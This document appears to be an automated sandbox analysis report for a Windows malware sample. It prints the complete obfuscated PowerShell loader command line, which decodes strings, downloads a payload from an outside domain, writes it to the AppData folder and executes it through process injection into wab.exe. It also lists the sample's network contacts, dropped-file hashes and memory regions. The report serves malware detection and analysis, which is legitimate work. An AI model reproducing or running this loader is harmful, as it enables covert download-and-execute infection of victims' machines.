'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2236 -ip 2236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 1724

Network

Country Destination Domain Proto
US 8.8.8.8:53 econstramedia.com udp
IN 103.211.216.55:443 econstramedia.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 55.216.211.103.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tejarat-gram.com udp
IR 185.83.114.124:443 tejarat-gram.com tcp
US 8.8.8.8:53 dvcasha2.ocsp-certum.com udp
GB 2.17.209.123:80 dvcasha2.ocsp-certum.com tcp
US 8.8.8.8:53 146.209.17.2.in-addr.arpa udp
US 8.8.8.8:53 124.114.83.185.in-addr.arpa udp
US 8.8.8.8:53 123.209.17.2.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 45.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 203.33.253.131.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/2888-2-0x00007FFB48023000-0x00007FFB48025000-memory.dmp

memory/2888-3-0x0000022B39C80000-0x0000022B39CA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qv5v52qj.hry.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2888-13-0x00007FFB48020000-0x00007FFB48AE1000-memory.dmp

memory/2888-14-0x00007FFB48020000-0x00007FFB48AE1000-memory.dmp

memory/1288-17-0x00000000745AE000-0x00000000745AF000-memory.dmp

memory/1288-18-0x00000000029B0000-0x00000000029E6000-memory.dmp

memory/1288-19-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/1288-20-0x00000000053D0000-0x00000000059F8000-memory.dmp

memory/1288-21-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/1288-22-0x0000000005330000-0x0000000005352000-memory.dmp

memory/1288-23-0x0000000005B00000-0x0000000005B66000-memory.dmp

memory/1288-24-0x0000000005B70000-0x0000000005BD6000-memory.dmp

memory/1288-30-0x0000000005CA0000-0x0000000005FF4000-memory.dmp

memory/1288-35-0x00000000062D0000-0x00000000062EE000-memory.dmp

memory/1288-36-0x00000000062F0000-0x000000000633C000-memory.dmp

memory/1288-37-0x0000000007BA0000-0x000000000821A000-memory.dmp

memory/1288-38-0x0000000006830000-0x000000000684A000-memory.dmp

memory/1288-39-0x00000000075C0000-0x0000000007656000-memory.dmp

memory/1288-40-0x0000000007520000-0x0000000007542000-memory.dmp

memory/1288-41-0x00000000087D0000-0x0000000008D74000-memory.dmp

C:\Users\Admin\AppData\Roaming\Coumarate.Bic

MD5 007cf6a92566beeac721341fb07ee93e
SHA1 8fcb0b9135d89b7cd0d038471bb901c20bee48b7
SHA256 362053d0e47717d018306ff0785c59415a2c7a72a44aa1140103efe093f584d8
SHA512 aad75aa8b7e967723996369c1d6ea0f3fced41b6748496b811024ce7202fab5839290b91222b4cad71d9db53f1efbeab851132823da710d6739297a21ad5cd41

memory/1288-43-0x0000000008D80000-0x000000000B640000-memory.dmp

memory/2888-44-0x00007FFB48023000-0x00007FFB48025000-memory.dmp

memory/2888-45-0x00007FFB48020000-0x00007FFB48AE1000-memory.dmp

memory/1288-53-0x00000000745AE000-0x00000000745AF000-memory.dmp

memory/1288-54-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/2236-55-0x00000000012D0000-0x0000000003B90000-memory.dmp

memory/1288-56-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/2888-59-0x00007FFB48020000-0x00007FFB48AE1000-memory.dmp

memory/2236-64-0x00000000012D0000-0x0000000003B90000-memory.dmp